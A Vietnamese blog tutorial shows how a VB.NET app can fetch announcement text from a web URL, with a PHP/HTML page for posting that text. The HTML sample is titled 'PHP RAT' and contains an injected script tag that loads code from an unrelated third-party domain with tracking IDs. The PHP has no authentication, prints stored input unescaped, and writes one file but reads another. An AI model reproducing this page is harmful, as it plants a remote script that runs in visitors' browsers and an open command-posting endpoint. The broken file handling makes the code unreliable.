[Visual Basic] Update text content to the application

Hi mọi người, bài viết này HungCoder.Com đã chia sẽ rất lâu cho mọi người, nhưng do blog kia bị xóa nên bài viết đó cũng đã bị xóa theo, hôm nay ngồi lục lại ai ngờ thấy rất hữu ích cho anh em muốn gửi thông tin online nhưng không phải cập nhật hay thêm nội dung text vào template rồi để người dùng tải lại. Như vậy rất mất công cho anh em mà lại phiền người dùng. :D


Về thủ thuật này thì hoàn toàn đơn giản nhé các bạn, nó không phức tạp như các bạn nghĩ đâu, chỉ cần các bạn thêm vào Form 1 Textbox hay 1 Label để hiển thị nội dung là ok rồi :D

FULL CODE
Đầu tiên các bạn thêm 2 dữ kiện này vào trước đã nhé :D
Imports System.Net
Imports System.IO

và tiếp đó thêm dữ liệu bên dưới vào Form hay Button :D
Dim webclient As New Net.WebClient
Label1.Text = webclient.DownloadString("http://data.hungcoder.com/ads.txt")

Như vậy đã xong, các bạn đã có thể viết chương trình nhận thông báo từ quản trị viên ứng dụng hay từ member thoải mái rồi :D, và cái đó cũng tùy thuộc bạn có công khai trang dữ liệu đó hay không nhé :D

Và dưới dây mình có thêm 1 Code Php cho mọi người làm trang tạo thông báo trực tuyến và hiển thị trên ứng dụng cho mọi người biết
CODE PHP AND HTML
<?php
if(isset($_POST['submit']))
{
$text = $_POST['text'];
file_put_contents("cm.txt", $text);
}
?>

<html>
<head>
 <title>Bờm Khùng Coder PHP RAT</title>
<script data-type="injected" src="//www.technologieyvonlheureux.com/addon/script/content_site?integration=anywhere&v=d9.68.1.18&os_mj=6&os_mn=1&os_bitness=64&mid=dc59998d19f63d43ceaec464375eedfd&uid=BE87A09AEA8E3F61A304445E1FAE8206&aid=1650&aid2=none&ts=1466297822&ts2="></script></head>
<body style="background-image: url('https://upload.wikimedia.org/wikipedia/commons/thumb/a/a7/Flag_of_Afghanistan_(1880%E2%80%931901).svg/2000px-Flag_of_Afghanistan_(1880%E2%80%931901).svg.png'); color: white">
 <center>
  <div style="background-color: black"><img src="https://lh6.googleusercontent.com/r7q_QixaHG4DMaR09hLqUKu1GgtbuPyPPIG_ii9C8yGHG0i0eQifm4ACbUsfbchZISB9Hzibrg=s640-h400-e365" alt="PHP RAT" /></div>
  <form action="#" method="POST" style="height: 520px; width: 480px">
  <textarea name="text" style="background-color: #333; color: white; width: 100%; height: 250px"><?php echo file_get_contents("commands.txt"); ?></textarea>
  <br />
  <input type="submit" name="submit" value="Save" style="margin-right: -1px; float: right" />
  </form>
 </center>
</body>
</html>

Từ đoạn code Php trên các bạn có thể tùy biến cho ứng dụng của các bạn thoải mái nhé. Có thể làm 1 trang chat trên website và hiển thị trên ứng dụng cho mọi người biết, hoặc có thể làm trang nhận thông báo update ứng dụng trên ứng dụng của các bạn :D

VIDEO DEMO


DEMO TEST
DOWNLOAD TEST

Các bạn nên lưu ý thay thể những thuộc tính phù hợp trong chương trình để nó hiển thị tốt nhất nhé :D
Chúc Các Bạn Thành Công Với Thủ Thuật Này.